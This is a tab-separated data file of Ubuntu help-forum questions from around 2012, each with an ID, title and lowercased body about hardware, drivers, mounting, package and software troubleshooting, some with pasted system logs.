119016	mechanical mouse using usb-to-ps/2 adapter freezes occasionally	i am using an aopen ps/2 mechanical mouse in ubuntu 11.10 with a staples usb-to-ps/2 adapter with my intel dp67de motherboard . the mouse is more comfortable for my hand as it has a lower height than optical mouses . occasionally the mouse cursor freezes and often i have to unplug it from the usb port and plug it back into another usb port to unfreeze it . this happens with all the usb ports . i 've been using the adapter for a two weeks now and this seems to be happening more often recently . what might be happening and is there anything that can be done to fix this ? the most recent output of dmesg | grep usb ( earlier lines of output truncated due to space limitations on this posting ) : [ 103776.634621 ] usb 1-1.6 : usb disconnect , device number 38 [ 103778.878922 ] usb 1-1.6 : new low speed usb device number 39 using ehci_hcd [ 103778.987368 ] input : chesen ps2 to usb converter as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.6/1-1.6:1.0/input/input76 [ 103778.987485 ] generic-usb 0003:0a81:0205.0049 : input , hidraw2 : usb hid v1.10 keyboard [ chesen ps2 to usb converter ] on usb-0000:00:1a.0-1.6/input0 [ 103778.995711 ] input : chesen ps2 to usb converter as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.6/1-1.6:1.1/input/input77 [ 103778.995841 ] generic-usb 0003:0a81:0205.004a : input , hidraw3 : usb hid v1.10 mouse [ chesen ps2 to usb converter ] on usb-0000:00:1a.0-1.6/input1 [ 105321.331436 ] usb 1-1.6 : usb disconnect , device number 39 [ 105332.265174 ] usb 1-1.6 : new low speed usb device number 40 using ehci_hcd [ 105332.373105 ] input : chesen ps2 to usb converter as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.6/1-1.6:1.0/input/input78 [ 105332.373232 ] generic-usb 0003:0a81:0205.004b : input , hidraw2 : usb hid v1.10 keyboard [ chesen ps2 to usb converter ] on usb-0000:00:1a.0-1.6/input0 [ 105332.381119 ] input : chesen ps2 to usb converter as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.6/1-1.6:1.1/input/input79 [ 105332.381257 ] generic-usb 0003:0a81:0205.004c : input , hidraw3 : usb hid v1.10 mouse [ chesen ps2 to usb converter ] on usb-0000:00:1a.0-1.6/input1 [ 105473.423859 ] usb 1-1.6 : usb disconnect , device number 40 [ 105484.103033 ] usb 1-1.6 : new low speed usb device number 41 using ehci_hcd [ 105484.211069 ] input : chesen ps2 to usb converter as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.6/1-1.6:1.0/input/input80 [ 105484.211184 ] generic-usb 0003:0a81:0205.004d : input , hidraw2 : usb hid v1.10 keyboard [ chesen ps2 to usb converter ] on usb-0000:00:1a.0-1.6/input0 [ 105484.219340 ] input : chesen ps2 to usb converter as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.6/1-1.6:1.1/input/input81 [ 105484.219473 ] generic-usb 0003:0a81:0205.004e : input , hidraw3 : usb hid v1.10 mouse [ chesen ps2 to usb converter ] on usb-0000:00:1a.0-1.6/input1 [ 109165.563603 ] usb 1-1.6 : usb disconnect , device number 41 [ 109239.381378 ] usb 1-1.6 : new low speed usb device number 42 using ehci_hcd [ 109239.489713 ] input : chesen ps2 to usb converter as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.6/1-1.6:1.0/input/input82 [ 109239.489828 ] generic-usb 0003:0a81:0205.004f : input , hidraw2 : usb hid v1.10 keyboard [ chesen ps2 to usb converter ] on usb-0000:00:1a.0-1.6/input0 [ 109239.498096 ] input : chesen ps2 to usb converter as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.6/1-1.6:1.1/input/input83 [ 109239.498232 ] generic-usb 0003:0a81:0205.0050 : input , hidraw3 : usb hid v1.10 mouse [ chesen ps2 to usb converter ] on usb-0000:00:1a.0-1.6/input1
119021	where can i get gawk library of functions ?	using xubuntu 11.10 i am learning gawk . i would like to get the gawk library of functions mentioned in the gawk users guide . the guide mentions extracting it from the gawk.texi with extract.awk , but i find that a bit too hard . is there a place where i can just download it ?
119024	risk of hard shutdown	what is the worst case scenario of a hard shutdown with ubuntu ( 11.10 ) ? ( in other words , turning psu off ) data loss os instability etc
119038	installing adobe air on ubuntu 12.04	i downloaded the binary , chmod-ed it , and it says i need gnome keyring or kde wallet , whick i already used . any ideas ?
119041	wine issues with runescape	believe it or not , i play runescape . i find the game to be interesting . out of my curiosity , i found that there is a way to play the game in an executable file . however , there was no linux download for this type of file , so i installed it with wine , and it seemed to work fine . the game loads up perfectly fine , until it finds updates . when it finds updates , it stops at exactly 92 % every time i try running it and i must force quit the application . anyone else have this issue ?
119045	requires untrusted packages - adobe flash player	i am new to this and could really use some help . i have tried looking online but i do n't understand what i need to do to fix this . my knowledge is very basic . help would be greatly appreciated .
119051	user in www-data group can not find command	i have installed a new application , and i wish to run it by a php script ( system and exec function ) , so that others can run it through their browsers . i tried to run that php script in my terminal at location as `` php shell.php '' , and it works , however , when i visit this php page , it says command not found . it also works in terminal when i logged in a new account ( created after the new application installed ) and the guest account . i think that may be caused by path settings , but why new account can run it right ( it may prove that path is global ) ?
119054	why do people use console-based file managers ?	to keep this question specific and on-topic , let me preface this by stating my intent is not to go into pros and cons of using one type of file manager over another . however , it is clear a significant group of people use console-based file managers , such as midnight commander or ranger . i 'd like to know their reasons for doing so .
119061	how can i get spotify to play m4a files ?	spotify on ubuntu 11.10 can only play mp3 , does spotify on ubuntu support m4a , if so how can i enable this ?
119067	had an established wireless network but still can not connect to the internet	currently running ubuntu 11.10. my wireless connection to our router has already been established but when i open firefox , the page says server not found.please help me
119077	how to change the shorcut for paste in yakuake ?	i installed yakuake 2.9.8 on a unity desktop . it works quite well , except for two issues with shortcuts . i want to use ctrl + v to paste ( because ctrl + shift + v is already used as a global shortcut for clipit ) , but there is no shortcut for paste in the `` configure shortcuts ... '' menu . this ubuntu forums thread says yakuake uses konsole shortcuts for copy/paste , but i see no effect after changing them .
119080	how to update kernel to the latest mainline version without any distro-upgrade ?	currently i 'm running linux-3.0 and i want to update it to linux-3.3.1 the latest stable kernel release as mentioned at http : //www.kernel.org . can i update to 3.3.1 in ubuntu without any risk of crashes ? i 'm updating my kernel regularly as provided by the update manager..currently i have linux-3.0.0.17..can i update ? note : the latest kernel version any user is supposed to use in ubuntu is updated automatically via the update manager , so no action is normally required by user regarding kernel upgrades . what the question author is referring to is mainline kernel , see : should i upgrade to the `` mainline '' kernels ?
119085	acer extensa 5620 - graphic unknown !	i install ubuntu 12.04 beta 2 , i found out the my graphic driver is `` unknown '' and experience is `` standard '' . please help me know how to install my graphic driver . as per my laptop specs : mobile intel gm965 express chipset with integrated 3d graphics , featuring intel graphics media accelerator ( gma ) x3100 with up to 358/3845 mb of intel dynamic video memory technology 4.0 ( 8 mb of dedicated system memory , up to 350/3765 mb of shared system memory ) , supporting microsoft directx 9 . hope you can help me ! thanks in advance ! noob @ ubuntu : ) updates ! ______________ i found a solution ! i found a site where i ask how to check the graphic of my system . by using terminal command `` glxinfo '' command ask me to install mesa-utils ! and update . after that , my graphic driver is listed ! thanks for your continues support ! : )
119089	can i install ubuntu 64x on an intel i3 processor to make use of full 4gb of ram ? or is only 86x loadable for i3 ?	i bought a new laptop , a intel i3 with 4gb ram . i wish to load ubuntu 12.04lts 64x to make use of all 4gb ram . can i load ubuntu 64x on an i3 even if it is not an amd and if so will it make full use of 4 gb ram i hope ?
119090	how to add new hard drive with ntfs partition ?	i added a new hard drive ( sdb1 , 500gb ) to my system ubuntu 11.10 . i found this line on the ubuntu help which i added to /etc/fstab # new hard drive sdb1 uuid=48dcf742dcf728b8 /newdisc ntfs defaults 0 2 but i kept getting boot errors that the system can not mount new hard disk as it has serious errors . the disk has only one partition occupying all its space , ntfs , created and formatted via windows 7 which is on the other partition ( sda5 ) and it had only a few test files on it . then i noticed that in fstab file that the system added another ntfs partition like this # /windows was on /dev/sda4 during installation uuid=bc7a37a77a375d78 /windows ntfs defaults , umask=007 , gid=46 0 0 what is the difference between these two entries ? funny thing is when i change the new hard drive entry in the fstab file to # new hard drive sdb1 uuid=48dcf742dcf728b8 /newdisc ntfs defaults , umask=007 0 0 i stop getting boot errors . but i am not sure if this is the right thing to do and if i can keep such settings ( umask and last digit o ) ? ? ? please help ! ! ! edit a result of cat /proc/partitions major minor # blocks name 8 0 312571224 sda 8 1 1 sda1 8 2 39062047 sda2 8 3 201945082 sda3 8 4 48122880 sda4 8 5 21374419 sda5 8 6 2064321 sda6 8 16 488386584 sdb 8 17 488383488 sdb1
119095	quake-style terminal with splitting in gnome other than yakuake	the most common quake-style terminal in gnome seem to be guake and tilda , but they ca n't split to show several shells in single tab like yakuake can . is there any alternative which can do so ?
119096	disabling password	i always annoyed when my new computer is turned on and log in , the problem is when i want to browse are always asked to enter a password , is there any way that i do not need to enter a password every new computer was first turned on ? i use ubuntu 12.04
119104	msi laptop with amd switchable graphics and ubuntu 11.10	i am new with ubuntu and i am having problems with getting my laptop work properly with ubuntu 11.10 . i would like to know , if anyone can help my with my problem , please . i would like to know if it is possible to turn off the ati card in the ubuntu . because now when i am working with the ubuntu , my laptops fan is working all the time ant the temperature is getting very high and also the battery runs out very fast so i would like to know how tu turn off the ati card and use only the intel card . in the system boot msi does n't have an option tu tur off the card . if someone could help me , it would be very good . thank you .
119108	the ubuntu interface asks only for a user password which is already set , and i do n't know it . what do i do ?	after downloading the ubuntu os , i rebooted my computer ( as recommended ) and the computer went straight to an id login interface- basically asking me to enter my 'user ' password , which i do not know . it is not the same password for my windows 7 account , and i have tried several other combinations which also do not work . i can login as a guest but can not access any of my saved material . please help me out .
119117	lifebook lh531 inbuilt card reader not working	inbuilt card reader ( sd/pro/sdhc ) not working . when i insert the memory card the indicator comes for a milli second and nothing happens . when i do lspci it gives the out put which is pasted below : i use ubuntu 11.10 . pl help pro-hq @ prohq-lifebook-lh531 : ~ $ lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.2 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 3 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm65 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 01:00.0 network controller : intel corporation centrino advanced-n 6205 ( rev 34 ) 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) pro-hq @ prohq-lifebook-lh531 : ~ $
119119	unable to update , it show the following errors.i am using ubuntu 11.10 32 bit in lenovo y450	w : gpg error : http : //extras.ubuntu.com oneiric release : the following signatures were invalid : badsig 16126d3a3e5c1192 ubuntu extras archive automatic signing key w : gpg error : http : //archive.canonical.com oneiric release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key
119121	strange traffic on fresh ubuntu server install	i 've just installed ubuntu server on my home box after becoming partially familiar with it at work and wanting to train up as a pen tester . i installed the latest version on a logical partition ( the main one contained win7 ) , and selected none of the extra modules ( i think ) . i installed ngrep and fired it up ( along with tcpdump ) and immediately saw some strange traffic which i am unable to identify . my pc is sending out udp packets every couple of seconds to a seemingly random series of ip addresses , all on the same port ( 47669 - though i did also see it use another port for a while ) . i watched it do this for about 20 mins , whilst trying to work out why it was doing it . the only other traffic was the odd arp request for the router and ssdp upnp broadcasts from the router . anyone know what this is , or have any advice on how best to find out ? thanks . edit : actually , it 's not my box generating the traffic . it 's receiving the traffic on that port , from a series of ip addresses , and returning 'port unreachable ' messages .
119122	pci passthrough on kvm	i am running kvm on ubuntu 11.10 on an intel-based machine , with g33 chipset and q6600 processor ( supports vt-d ) . i am having problems when i want to add my pci tv card to my virtual machine . i get this error `` no iommu found . unable to assign device `` hostdev0 '' '' . can anyone guide me how to set this up correctly , so my pci tv card is passed through to the virtual machine ? i have added this to my configuration file : < hostdev mode='subsystem ' type='pci ' managed='yes ' > < source > < address bus='0x03 ' slot='0x00 ' function='0x00'/ > < /source > < /hostdev > and this is the device information : < device > < name > pci_0000_03_00_0 < /name > < parent > pci_0000_00_1c_1 < /parent > < driver > < name > cx23885 < /name > < /driver > < capability type='pci ' > < domain > 0 < /domain > < bus > 3 < /bus > < slot > 0 < /slot > < function > 0 < /function > < product id='0x8852 ' > cx23885 pci video and audio decoder < /product > < vendor id='0x14f1 ' > conexant systems , inc. < /vendor > < /capability > < /device > thanks for your help ; - )
119123	change default right click menu color from white to black ?	in 12.04 ambiance theme , the default right click menu color changed from black to white . from this bug-report , it appears this decision is by design but i love black only . how can i change it to black ?
119125	how to change btrfs partition label/uuid ?	i upgraded to a new harddisk by using dd to copy the partition . as the old disk is still in place , the computer seems to randomly boot one or another . to fix this i thought , changing the uuid/label of the disk and adjusting /etc/fstab accordingly might help . however i do n't find a command with similar capabilities as tune2fs . any suggestions ?
119128	does compiz work on ubuntu 11.10	i am runing ubuntu 11.10 and was wondering if compiz ( i think that is the right name for the program , the one that lets you have wobbly windows right ? ) works on ubuntu 11.10 . i saw some comments in software that did n't look so hopefull like that it will crash the system ... is this true ? is there a way to make it not crash ?
119140	failed to compile network manager 0.9.4	after upgrading to 12.04 i needed to re-compile network manager to the version 0.9.4.0 again . however with the version 9.4.0 i faced with the error during compilation with libdns-manager : $ make ... making all in dns-manager make [ 4 ] : вхожу у каталог `` /home/stasevych/install/network-manager/nm0.9.4.0/network-manager-0.9.4.0/src/dns-manager '' /bin/bash ../../libtool -- tag=cc -- mode=compile gcc -dhave_config_h -i . -i../.. -i../../src/logging -i../../libnm-util -i../../libnm-util -i../../src -i../../include -i../../include -i/usr/include/libnl3 -i/usr/include/libnl3 -i/usr/include/libnl3 -i/usr/include/dbus-1.0 -i/usr/lib/x86_64-linux-gnu/dbus-1.0/include -i/usr/include/glib-2.0 -i/usr/lib/x86_64-linux-gnu/glib-2.0/include -pthread -i/usr/include/glib-2.0 -i/usr/lib/x86_64-linux-gnu/glib-2.0/include -dlocalstatedir=\ '' /usr/local/var\ '' -wall -std=gnu89 -g -o2 -wshadow -wmissing-declarations -wmissing-prototypes -wdeclaration-after-statement -wfloat-equal -wno-unused-parameter -wno-sign-compare -fno-strict-aliasing -wno-unused-but-set-variable -wundef -werror -mt libdns_manager_la-nm-dns-manager.lo -md -mp -mf .deps/libdns_manager_la-nm-dns-manager.tpo -c -o libdns_manager_la-nm-dns-manager.lo `test -f 'nm-dns-manager.c ' || echo './'`nm-dns-manager.c libtool : compile : gcc -dhave_config_h -i . -i../.. -i../../src/logging -i../../libnm-util -i../../libnm-util -i../../src -i../../include -i../../include -i/usr/include/libnl3 -i/usr/include/libnl3 -i/usr/include/libnl3 -i/usr/include/dbus-1.0 -i/usr/lib/x86_64-linux-gnu/dbus-1.0/include -i/usr/include/glib-2.0 -i/usr/lib/x86_64-linux-gnu/glib-2.0/include -pthread -i/usr/include/glib-2.0 -i/usr/lib/x86_64-linux-gnu/glib-2.0/include -dlocalstatedir=\ '' /usr/local/var\ '' -wall -std=gnu89 -g -o2 -wshadow -wmissing-declarations -wmissing-prototypes -wdeclaration-after-statement -wfloat-equal -wno-unused-parameter -wno-sign-compare -fno-strict-aliasing -wno-unused-but-set-variable -wundef -werror -mt libdns_manager_la-nm-dns-manager.lo -md -mp -mf .deps/libdns_manager_la-nm-dns-manager.tpo -c nm-dns-manager.c -fpic -dpic -o .libs/libdns_manager_la-nm-dns-manager.o mv -f .deps/libdns_manager_la-nm-dns-manager.tpo .deps/libdns_manager_la-nm-dns-manager.plo /bin/bash ../../libtool -- tag=cc -- mode=compile gcc -dhave_config_h -i . -i../.. -i../../src/logging -i../../libnm-util -i../../libnm-util -i../../src -i../../include -i../../include -i/usr/include/libnl3 -i/usr/include/libnl3 -i/usr/include/libnl3 -i/usr/include/dbus-1.0 -i/usr/lib/x86_64-linux-gnu/dbus-1.0/include -i/usr/include/glib-2.0 -i/usr/lib/x86_64-linux-gnu/glib-2.0/include -pthread -i/usr/include/glib-2.0 -i/usr/lib/x86_64-linux-gnu/glib-2.0/include -dlocalstatedir=\ '' /usr/local/var\ '' -wall -std=gnu89 -g -o2 -wshadow -wmissing-declarations -wmissing-prototypes -wdeclaration-after-statement -wfloat-equal -wno-unused-parameter -wno-sign-compare -fno-strict-aliasing -wno-unused-but-set-variable -wundef -werror -mt libdns_manager_la-nm-dns-dnsmasq.lo -md -mp -mf .deps/libdns_manager_la-nm-dns-dnsmasq.tpo -c -o libdns_manager_la-nm-dns-dnsmasq.lo `test -f 'nm-dns-dnsmasq.c ' || echo './'`nm-dns-dnsmasq.c libtool : compile : gcc -dhave_config_h -i . -i../.. -i../../src/logging -i../../libnm-util -i../../libnm-util -i../../src -i../../include -i../../include -i/usr/include/libnl3 -i/usr/include/libnl3 -i/usr/include/libnl3 -i/usr/include/dbus-1.0 -i/usr/lib/x86_64-linux-gnu/dbus-1.0/include -i/usr/include/glib-2.0 -i/usr/lib/x86_64-linux-gnu/glib-2.0/include -pthread -i/usr/include/glib-2.0 -i/usr/lib/x86_64-linux-gnu/glib-2.0/include -dlocalstatedir=\ '' /usr/local/var\ '' -wall -std=gnu89 -g -o2 -wshadow -wmissing-declarations -wmissing-prototypes -wdeclaration-after-statement -wfloat-equal -wno-unused-parameter -wno-sign-compare -fno-strict-aliasing -wno-unused-but-set-variable -wundef -werror -mt libdns_manager_la-nm-dns-dnsmasq.lo -md -mp -mf .deps/libdns_manager_la-nm-dns-dnsmasq.tpo -c nm-dns-dnsmasq.c -fpic -dpic -o .libs/libdns_manager_la-nm-dns-dnsmasq.o nm-dns-dnsmasq.c : in function 'update ' : nm-dns-dnsmasq.c:274:2 : error : passing argument 1 of 'g_slist_copy ' discards 'const ' qualifier from pointer target type [ -werror ] /usr/include/glib-2.0/glib/gslist.h:82:10 : note : expected 'struct gslist * ' but argument is of type 'const struct gslist *' cc1 : all warnings being treated as errors make [ 4 ] : *** [ libdns_manager_la-nm-dns-dnsmasq.lo ] помилка 1 make [ 4 ] : залишаю каталог `` /home/stasevych/install/network-manager/nm0.9.4.0/network-manager-0.9.4.0/src/dns-manager '' make [ 3 ] : *** [ all-recursive ] помилка 1 make [ 3 ] : залишаю каталог `` /home/stasevych/install/network-manager/nm0.9.4.0/network-manager-0.9.4.0/src '' make [ 2 ] : *** [ all ] помилка 2 make [ 2 ] : залишаю каталог `` /home/stasevych/install/network-manager/nm0.9.4.0/network-manager-0.9.4.0/src '' make [ 1 ] : *** [ all-recursive ] помилка 1 make [ 1 ] : залишаю каталог `` /home/stasevych/install/network-manager/nm0.9.4.0/network-manager-0.9.4.0 '' make : *** [ all ] помилка 2 has anybody faced with the similar errors ? thank you in advance for your help .
119143	is there any way to format my hard drive so that data can not be restored ?	i have 500 gb hd and i have very important personal data in it . the thing is that if i format my hard drive and sell my pc , there is a chance that someone will reformat it and restore all data in it . so is there any way no one can restore my data after i format it ?
119149	upower wants to uninstall lots of packages	i 'm running natty and have a problem with upower . currently installed is upower 0.9.5-4 ( maverick ? ) , with upower 0.9.9-4 available . update manager wo n't upgrade it , but if i go to synaptic and use ctrl+e ( force version ) it prompts to remove all of the following packages : gdm gdm-guest-session gnome-power-manager gnome-session gnome-session-bin indicator-session nautilus-share ubuntu-desktop this seems like a fair chunk of the gui , so i 'm not keen to let it go ahead . is there a better/safer way to force the package upgrade ? note : this machine was upgraded from maverick to natty using the alternate cd a while ago . it locked-up about 80-90 % through the upgrade requiring the machine to be hard reset , but it finished the upgrade process after rebooting . i was making sure everything was ok before going to oneiric when i discovered this little gem .
119154	how do i get an epson 7520 ( all-in-one ) printer working ?	can an epson 7520 printer be installed in ubuntu 10.04lts ?
119159	can i make my desktop icons smaller ?	i would like to make all my desktop icons slightly smaller . i know i can do each one manually but that is impractical given i create and destroy about 20 files a day on my desktop . i need an answer pointed at gnome classic/gtk3 ( as in 11.10 , 12.04 , and onward )
119160	new installation dropping me to login prompt . no gui	just now i installed ubuntu on my mac and when i booted it after installation then it just gets stuck on blue/purple screen . i rebooted and this time chose option of booting in recovery mode where i then selected 'normal boot ' and then i was dropped at login command prompt . no gui screen or anything . what can be done ?
119161	ca n't run chromium-browser after last update	i updated my ubuntu , and now i ca n't run chromium . padra @ padra-inspiron-n5110 : ~ $ chromium-browser [ 8347:8347:7877547751 : error : extension_error_reporter.cc ( 56 ) ] extension error : could not load extension from '/home/padra/desktop/email_this_page ' . manifest file is missing or unreadable . [ 2:2:7877908918 : error : zygote_main_linux.cc ( 520 ) ] write : broken pipe segmentation fault where is the problem ?
119166	set default internet connection in ubuntu 11.04	i have created a dsl connection on my ubuntu 11.04 and have checked the `` connect automatically '' option in it . though , when i start my pc , i get to see `` wired network disconnected - you are now offline '' and to get internet working , i have to select the dsl option in the network connections menu in the tray at the top . so , how to make my dsl connection as the default connection ? edited i have noticed that if i let modem to start before actually starting ubuntu then , on startup ubuntu connects to dsl automatically . therefore , the problem lies in reconnecting to a connection automatically . is there an option for the same ?
119169	adding mime type	hello i 'm creating an ide called sly . sly creates .slyproj files i want that when user click on it they see the file icon , and sly must open up ! i asked on the irc i made sly.sharedmimeinfo : http : //paste.ubuntu.com/915799/ ( in first row ? is missing i now ) and i 've added dh_installmime -i to my rules file sly.desktop : http : //paste.ubuntu.com/915941/ then i packaged the .deb but nothing happened to .slyproj files ( i ca n't see the icon ) -- edit : i edit sly.sharedmimeinfo : paste.ubuntu.com/916010 now when i double click on .slyproj i ca n't see icon but it says that no application is found for opening .slyproj now it works when i click .slyproj sly open ups ! i only ca n't see file icon ...
119172	do i lose lts support if i upgrade to a non-lts release ?	i have been using ubuntu since 8.04 as my primary os and every six months i upgrade to the latest distribuition release . i am currently using 12.04 lts . thinking ahead , if i upgrade to 12.10 or any other future release , do i lose the long-term support ( lts ) ? this may be a stupid question as i found part of my answer in this link .
119176	touchpad not working on hp dv4 notebook	the touchpad does n't respond at all . i had to use an external usb mouse even to install ubuntu . i dont know the name of the manufacturer too . i am a newbie to ubuntu . i checked many related answers but they didnt help some are : sudo rmmod psmouse sudo modprobe psmouse proto=imps i used deconf editor_ in that it shows that touchpad is enabled but nothing haapens . i tried changing the setting 'disable while typing ' that did n't work either . please help me . i really want to use ubuntu as i find it really good but without touchpad it would be pointless . literally .
119177	world of warcraft launcher crashes on wine	just downloaded the installer for wow from eu.battle.net , and the launcher it crashes after 1-2 minutes ( so the new patches can not be installed ) . i 've tried looking on google , but i was unable to find an answer . terminal output
119179	how do i uninstall ubuntu 11.10 from ubuntu ?	i installed a small 3gb ubuntu partition just to delete some annoying files in xp , but i accidentally turned the xp partition into swap and i can only boot in ubuntu . i do not necessarily want to save any of the xp data , but just to uninstall ubuntu and reinstall xp from a usb flash drive ( when i try doing that , i can not see the hard drive to boot on ) .
119185	using opencv on 12.04	i have some simple opencv files which i wanted to compile on 12.04 . i have installed all the -dev packages they use : # include < cv.h > # include < highgui.h > at the top of the file . using g++ `pkg-config -- cflags -- libs opencv` canny.cpp gives cv.h : no such file or directory pkg-config seems to list /usr/include/opencv but the directory created at install is /usr/include/opencv2 is this a bug ? any advice ?
119190	why does my laptop overheat ever so often and shut down with ubuntu 11.10 installed ?	i had windows 7 until yesterday , and then i wiped out my hard disc to install ubuntu 11.10 . but i 've noticed that it overheats very quickly and gives you no reaction time and just switches off ! similar to what would happen if you were to remove battery and unplug the power source ! i had a similar problem when i was running the laptop on windows 7 but that happened rarely . i have an hp pavilion g6 which is less than a year old now . i want to know if theres any settings i can change or do anything that 'll help me overcome this problem .
119192	how can i get my notes from the pegasus notemaker pen ?	i 've just bought my notemaker , an electronic pen from http : //www.pegatech.com/ and wonder if i can download notes on ubuntu . anybody can help ?
119195	can not disable airplane mode	when i use gnome network manager it indicates that wireless is disabled by hardware switch while it is not . even in windows i can not turn on my wireless !
119196	how to download the source packages for all installed packages ?	what apt incantations do i need to use to download the source packages for all the installed packages into a directory ? ( the use case is gpl compliance when giving an installed ubuntu system to another person along with a computer . )
119205	how do i send alt+ctrl+f1 through synergy ?	i use synergy to control both of my desktops from the same keyboard and mouse . is there a way to send alt+ctrl+f1 ( or related combinations ) to the client desktop using synergy ? i tried using the suggestion below , but got : doneill @ dsktp : ~ $ chvt 1 could n't get a file descriptor referring to the console other ideas ? i would still prefer a way to send the actual keystrokes over synergy , but if that 's not possible , a work around that works will be accepted .
119207	intel hd graphics works on unity , but no in gnome shell	i cant play starcraft 1 in gnome shell ( to slow ) , in unity runs perfect .why ?
119211	how to write image to sd card	i am following the ridgerun documentation : how to boot a board from a sd card . i disable nautilus from auto-mounting file systems to avoid a possible race condition and build the sd card image . i am not quite sure about step 4 , `` insert a sd card in your pc and wait until it is mounted '' but i see /dev/sdb1 only when the sd card is in so i assume /dev/sdb1 is my sd card and is mounted . when i type `` mount '' as suggested in step 5 i do n't see anything like this ' '' /dev/sdb1 '' ' on /media/boot type vfat ( rw , nosuid , nodev , uhelper=udisks , uid=1000 , gid=1000 , shortname=mixed , dmask=0077 , utf8=1 , flush ) but i do see this /dev/sda1 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) none on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) none on /dev type devtmpfs ( rw , mode=0755 ) none on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) none on /dev/shm type tmpfs ( rw , nosuid , nodev ) none on /var/run type tmpfs ( rw , nosuid , mode=0755 ) none on /var/lock type tmpfs ( rw , noexec , nosuid , nodev ) none on /lib/init/rw type tmpfs ( rw , nosuid , mode=0755 ) rpc_pipefs on /var/lib/nfs/rpc_pipefs type rpc_pipefs ( rw ) nfsd on /proc/fs/nfsd type nfsd ( rw ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfs-fuse-daemon on /home/jnadelman/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=jnadelman ) assuming nothing needs to be unmounted i do a sudo dd if=sdcard.img of=/dev/sdb1 and see 262144+0 records in 262144+0 records out 134217728 bytes ( 134 mb ) copied , 50.8677 s , 2.6 mb/s so i move the sd-card from the pc to the leopardboard , turn on dip switch 2 , and power on the leopardboard but do n't see any console activity . moving the sd-card back to the pc i do n't see anything in /media so i turn auto-mount back on and look with nautilus but still do n't see anything . i think sdcard.img has been written to the bit bucket but ca n't be sure . i have been able to run this image using nfs but i need to be able to run it from the sd-card . is the ridgerun sd-card documentation incorrect or incomplete ? how do i write sdcard.img ?
119213	uninstall cisco vpn client ( anyconnect )	i am working on buntu 12.04 lts . currently , halt on cisco vpn client for launch , does you know how to uninstall cisco vpn client ( any connect ) from commend line on ubuntu 12.04 ? or disable it for automatically start ?
119217	mounting ntfs on startup gives errors	i have a ntfs partition that i want to be mounted on every startup . currently kubuntu tells me on every startup there have been errors checking the filesystem and then stops the boot process until i told it to ingore or skip or manually recover from the errors . if i press skip the partition gets mounted and everything seems to work fine . if i mount that same partition with sudo mount /media/windows_data after startup i get no errors whatsoever . the corresponding part of the fstab file : uuid=f444e6dc44e6a09a /media/windows_data ntfs defaults , users , auto 0 2 this is what /var/log/boot.log has to say to this : /boot.log : mountall : fsck /media/windows_data [ 424 ] brach mit dem status 8 ab /boot.log : mountall : nicht behebbarer fsck-fehler : /media/windows_data /boot.log : fehler auf /media/windows_data werden auf anfrage des benutzers ignoriert unfortunately thats in german so i will try to translate that /boot.log : mountall : fsck /media/windows_data [ 424 ] stopped with status 8 /boot.log : mountall : not recoverable fsck-error : /media/windows_data /boot.log : errors on /media/windows_data will be ignored due to user request . any ideas what i can try to get this error fixed ?
119219	thunderbird/firefox with shared profiles ( lubuntu+winxp )	i use thunderbird and firefox both on winxp and lubuntu 11.10 . the profile folders are on the ntfs-partition of windows and i 'm sure that i 've edited the profile paths correctly . windows does n't show any problems but lubuntu shows the error dialog saying that another instance of thunderbird/firefox is already running ... '' the funny thing is , that as soon as i 've opened the profile folders in my explorer , firefox and thunderbird can be started . i do n't have to change any files or something ( have made some experiments with .parentlock ) do you have an idea how i could solve this problem , as i do n't want to open the profile folders after every reboot . thanks in advance !
119232	why pssh command is not working ?	i have pssh package installed in my ubuntu 11.10 x64 system . and i can run the program via calling parallel-ssh however , pssh gives me $ pssh no command 'pssh ' found , did you mean : command 'bssh ' from package 'avahi-ui-utils ' ( universe ) command 'cssh ' from package 'clusterssh ' ( universe ) command 'ssh ' from package 'openssh-client ' ( main ) command 'posh ' from package 'posh ' ( universe ) command 'pdsh ' from package 'pdsh ' ( universe ) command 'mssh ' from package 'mssh ' ( universe ) command 'zssh ' from package 'zssh ' ( universe ) command 'rssh ' from package 'rssh ' ( universe ) command 'ppsh ' from package 'ppsh ' ( universe ) command 'push ' from package 'heimdal-clients ' ( universe ) pssh : command not found why does this happen and what is a right way to get pssh command working ? p.s . i know that i can create link named /usr/bin/pssh linked to /usr/bin/parallel-ssh but these seems dirty hack to me . : (
